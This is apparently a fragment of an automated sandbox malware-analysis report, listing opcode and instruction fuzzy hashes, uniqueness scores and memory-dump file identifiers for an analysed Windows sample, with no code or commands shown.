                                                                                                                                                                                            • Instruction ID: e9658923ce2dedc02297f61cde213307b4d11227ec2aef7811d88f468fa70961
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a7d407d7729a8694e7779ca2a1de00754ab8488b643d7346c0eaced0571dbb1
                                                                                                                                                                                            • Instruction Fuzzy Hash: CF114F32608B8282EF219F15F940269B7A4FF88B94F584231DF8C07BA8DF7DD9518700
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                            • API String ID: 2595371189-336475711
                                                                                                                                                                                            • Opcode ID: 088d6e29a3b0fed2a997de7a9fe2f09f1c5d5ef028721ffa5e057cac36b0a100
                                                                                                                                                                                            • Instruction ID: b881533dcab3db7282e7257b2eb1bbfd8ea6759990dfe4751703f48b2d846586
                                                                                                                                                                                            • Opcode Fuzzy Hash: 088d6e29a3b0fed2a997de7a9fe2f09f1c5d5ef028721ffa5e057cac36b0a100
                                                                                                                                                                                            • Instruction Fuzzy Hash: 26018F61B1C24386FB22FF60986227FA3A0EF44758FC40136D55D86699DFACE544DB34
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%